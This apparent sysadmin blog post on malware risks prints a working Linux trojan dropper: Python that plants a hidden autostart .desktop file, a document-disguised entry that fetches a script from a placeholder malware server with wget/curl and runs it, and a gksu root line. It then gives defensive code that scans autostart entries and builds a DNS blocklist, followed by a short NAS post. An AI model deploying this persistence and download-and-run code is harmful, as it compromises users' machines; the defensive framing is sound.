Understanding how your network is at risk – Part 1

Your network is at risk! I can tell you that without even analyzing your network. There are threats all around you, and you are even a threat yourself.

  • Your external or public network gets scanned several times a day by bad people all over the world.
  • You receive malicious emails all the time in the form of spam that will lead you to Trojans and viruses.
  • Your web browsing habits make you susceptible to almost any web-based attack, even if you're on a trusted site.

This small series will show you how you are at risk and what you can do. This guide is not complete and will not solve or even address every problem out there. This is written to help you defend properly. It’s a simple collection written for Uber Geeks and Sys Admins.

Malware: It's everywhere. An 8-year-old script kiddie can write code that will hold your data hostage. A 21-year-old college student can insert an invisible iframe into a trusted site that directs you to a malicious file which steals FTP passwords.

It can hijack your browser, redirect your search attempts, serve up nasty pop-up ads, track which web sites you visit, and generally screw things up. Malware programs are usually poorly programmed and can make your computer unbearably slow and unstable in addition to all the other havoc they wreak. Many of them will reinstall themselves even after you think you have removed them, or hide deep within Windows, making them very difficult to clean.

Malware often comes bundled with other programs (Kazaa, iMesh, and other file sharing programs seem to be the biggest bundlers). These malware programs usually pop up ads, sending the ad revenue to the program's authors. Others are installed from websites that pretend the software is needed to view the site. Still others, most notably some of the CoolWebSearch variants, install themselves through holes in Internet Explorer the way a virus would, requiring you to do nothing but visit the wrong web page to get infected. The vast majority, however, must be installed by the user. Unfortunately, getting infected with malware is usually much easier than getting rid of it, and once malware is on your computer it tends to multiply.

Looking at some open source malware projects, it's really easy to get your hands on something that will hurt you and your entire network if you do not take precautions.

Using SQL injection (as one example), I could take over a site and insert code that leads you elsewhere. I could have it redirect automatically in the background without you knowing. The malware would execute, and before you know it my program could be logging your keystrokes and reporting them back to my server. What's scary is that lots of malware does exactly this, and it could be on your computer right now without you knowing.

Malicious emails hit your inbox all the time, and they can do really bad things. Take a look at this Linux Trojan that takes advantage of a flaw in the GNOME and KDE desktop environments:

   import os
   # Persistence: GNOME and KDE launch every .desktop entry found in ~/.config/autostart at login
   relauncher_str = """
   [Desktop Entry]
   Type=Application
   Name=Malware
   Exec=python .local/.hidden/s.py
   Icon=system-run
   """
   uname = os.getlogin()
   drop_dir = "/home/%s/.config/autostart" % uname
   os.makedirs(drop_dir)
   f = open(drop_dir + "/Malware.desktop", "w")
   f.write(relauncher_str)
   f.close()

   [Desktop Entry]
   Type=Application
   Name=some_text.odt
   Exec=bash -c 'URL=http://www.my_malware_server.com/s.py ; DROP=~/.local/.hidden ; mkdir -p $DROP; if [ -e /usr/bin/wget ] ; then wget $URL -O $DROP/s.py ; else curl $URL -o $DROP/s.py ; fi; python $DROP/s.py'
   Icon=/usr/share/icons/hicolor/48x48/apps/ooo-writer.png

Even this simple line will execute the script with root privileges:

Exec=gksu python .local/.hidden/s.py
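A defender's counterpart to the entries above, added here as an example (this is not code from the post): it parses the .desktop files in a user's autostart directory and flags the traits the dropper relies on (hidden directories, downloads at launch, gksu, inline shell, and a document-like Name on an Application entry). The directory path, the heuristics and the sample entry are my assumptions.

```python
import re
from pathlib import Path
# Heuristics derived from the dropper entries shown above; the patterns and sample are constructed for this example.
SUSPICIOUS_EXEC = [
    (re.compile(r"(^|[\s/~])\.[A-Za-z0-9_-]+/"), "runs something from a hidden directory"),
    (re.compile(r"\b(wget|curl)\b"), "downloads a payload at launch"),
    (re.compile(r"\b(gksu|gksudo|sudo|pkexec)\b"), "asks for root privileges"),
    (re.compile(r"\b(ba)?sh\s+-c\b"), "runs an inline shell command"),
    (re.compile(r"https?://"), "embeds a URL"),
]
DOC_SUFFIXES = (".odt", ".doc", ".docx", ".pdf", ".xls", ".txt")

def parse_desktop(text):
    """Collect key=value pairs from the [Desktop Entry] group of a .desktop file."""
    entry, in_group = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("["):                      # group header, e.g. [Desktop Entry]
            in_group = line == "[Desktop Entry]"
        elif in_group and "=" in line and not line.startswith("#"):
            key, _, value = line.partition("=")
            entry[key.strip()] = value.strip()
    return entry

def audit_entry(entry):
    """Return the reasons an autostart entry resembles the dropper above (empty list if none)."""
    exec_cmd = entry.get("Exec", "")
    findings = [why for rx, why in SUSPICIOUS_EXEC if rx.search(exec_cmd)]
    # A document-like Name on a Type=Application entry is the disguise used in the post.
    if entry.get("Type") == "Application" and entry.get("Name", "").lower().endswith(DOC_SUFFIXES):
        findings.append("Name imitates a document but the entry launches a program")
    return findings

def audit_autostart(autostart_dir=None):
    """Scan every .desktop file in the per-user autostart directory and return {file: findings}."""
    base = Path(autostart_dir) if autostart_dir else Path.home() / ".config" / "autostart"
    report = {}
    if not base.is_dir():
        return report
    for path in sorted(base.glob("*.desktop")):
        findings = audit_entry(parse_desktop(path.read_text(errors="replace")))
        if findings:
            report[path.name] = findings
    return report
# Constructed sample mirroring the disguised entry from the post (placeholder URL, not a real host).
SAMPLE_DROPPER = """[Desktop Entry]
Type=Application
Name=some_text.odt
Exec=bash -c 'mkdir -p ~/.local/.hidden; curl http://example.invalid/s.py -o ~/.local/.hidden/s.py; python ~/.local/.hidden/s.py'
"""
```

Run audit_autostart() for each user account; a clean desktop normally returns an empty report, and any hit deserves a look at the referenced script.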

Solution:

Implement scanning on your border gateway, for example with Snort. Snort looks for known attack signatures and drops packets that match them. IPCop and pfSense offer Snort as an add-on to watch incoming and outgoing traffic.

Scan your PC for malware often. Avast and Spybot S&D are excellent software solutions; run them both, and let Spybot immunize you against bad sites.

Run updated AV on all clients. Symantec, need I say more.

Don't blindly click on attachments that people have sent you. Even on Linux, this advice should be taken seriously.

Kill the Windows Messenger service.

Be skeptical of what you download and install. There are lots of great programs out there, but don't install anything that looks suspicious or out of place. Research the software before installing it, and scan it: try VirusTotal before you install an application or a downloaded game. Don't install a codec that a downloaded video claims to require; use a trusted codec pack instead. Verify that your Internet Explorer security settings are set correctly, and disable ActiveX for untrusted sites. Run NoScript with Firefox!

Always keep your software up to date. Run Windows Update often, and always install a Windows update: sometimes they are zero-day patches.

And always run a firewall on every client and server. I would even block known bad IPs globally on the border gateway. Take a look at your hosts file after Spybot S&D has immunized it and use it as a template for your border gateway.
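One way to turn those immunization entries into a gateway block list, added here as an example (not code from the post): it parses hosts-file lines, keeps only the names sinkholed to 127.0.0.1 or 0.0.0.0, and emits them in dnsmasq's address= syntax, assuming dnsmasq is the resolver on your gateway. The sample hosts content and its names are constructed.

```python
import ipaddress

# Constructed sample of the kind of entries Spybot's immunization adds to the hosts file (placeholder names).
SAMPLE_HOSTS = """\
127.0.0.1       localhost
::1             localhost
# Start of entries inserted by Spybot - Search & Destroy (constructed sample)
127.0.0.1  ads.example.invalid
127.0.0.1  tracker.example.invalid   # trailing comment
127.0.0.1  ads.example.invalid
0.0.0.0    malware.example.invalid
not-an-ip  bogus.example.invalid
192.168.1.10   fileserver.lan
"""

SINKHOLES = {"127.0.0.1", "0.0.0.0", "::1"}          # addresses that mean "block this name"
LOCAL_NAMES = {"localhost", "localhost.localdomain", "broadcasthost"}

def blocked_hosts(hosts_text):
    """Return the sorted, de-duplicated names the hosts file sinkholes, ignoring localhost and real LAN hosts."""
    names = set()
    for raw in hosts_text.splitlines():
        line = raw.split("#", 1)[0].strip()            # drop comments and surrounding whitespace
        if not line:
            continue
        addr, *hostnames = line.split()
        try:
            ipaddress.ip_address(addr)
        except ValueError:
            continue                                   # malformed line, skip it
        if addr not in SINKHOLES:
            continue                                   # a genuine mapping (e.g. a file server), not a block
        for name in hostnames:
            if name.lower() not in LOCAL_NAMES:
                names.add(name.lower())
    return sorted(names)

def dnsmasq_blocklist(hosts_text):
    """Render the blocked names as dnsmasq 'address' lines for the border gateway resolver."""
    return [f"address=/{name}/0.0.0.0" for name in blocked_hosts(hosts_text)]
```

Write the returned lines into a dnsmasq config fragment on the gateway and every client that uses it as its resolver gets the same protection, not just the immunized PC.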

Lastly, educate your users. Internal threats are worse than external ones. Educate users to minimize infections and network problems.

Next: Network scanning, brute force, and sniffing.

NAS Craze

If you don't have a NAS, you're crazy! What else would you store your files on in a secure location? Network Attached Storage is expensive, though, so why not build your own?

QNAP is an excellent brand when it comes to NAS devices, but the price tag is outrageous. If you want a 6-bay NAS that supports RAID 5 and 6, be prepared to pay above six hundred dollars. Can you build your own that will perform as well as, if not better than, a device that expensive? The answer is yes!

All you need is a RAID card such as the HighPoint 2300 or 2200, a case that holds at least 4 hard disks, a motherboard and CPU, and an OS.

I run my NAS devices on Server 2008, but there is a perfect competitor that offers all of the basic features of Windows in a small package: FreeNAS. It doesn't really matter which case you select, as long as you like it, since most hold more than 4 hard disks.

With the above scenario you can build a professional NAS for under $600, but more on this later.

Tomschaefer.org is building the perfect NAS in the next couple of months! We will show you what to buy, how to put it together, how to configure it, and what to expect. We will also show you how to get the most space and the most performance out of your built NAS while saving you hundreds of dollars.

You might be asking right now why you would need a NAS device in the house anyway: "I have a 2TB hard drive, that's plenty of space." Wrong! If that drive dies, what are you going to do to retrieve your priceless pictures, files, and school work? A NAS device running RAID 5 or 6 will recover from a hard drive crash and keep your files the way you like them: working.

Look for the NAS post on Tomschaefer.org in the next couple of months that will reveal the secrets of NAS devices and what they can do for you while saving you hundreds.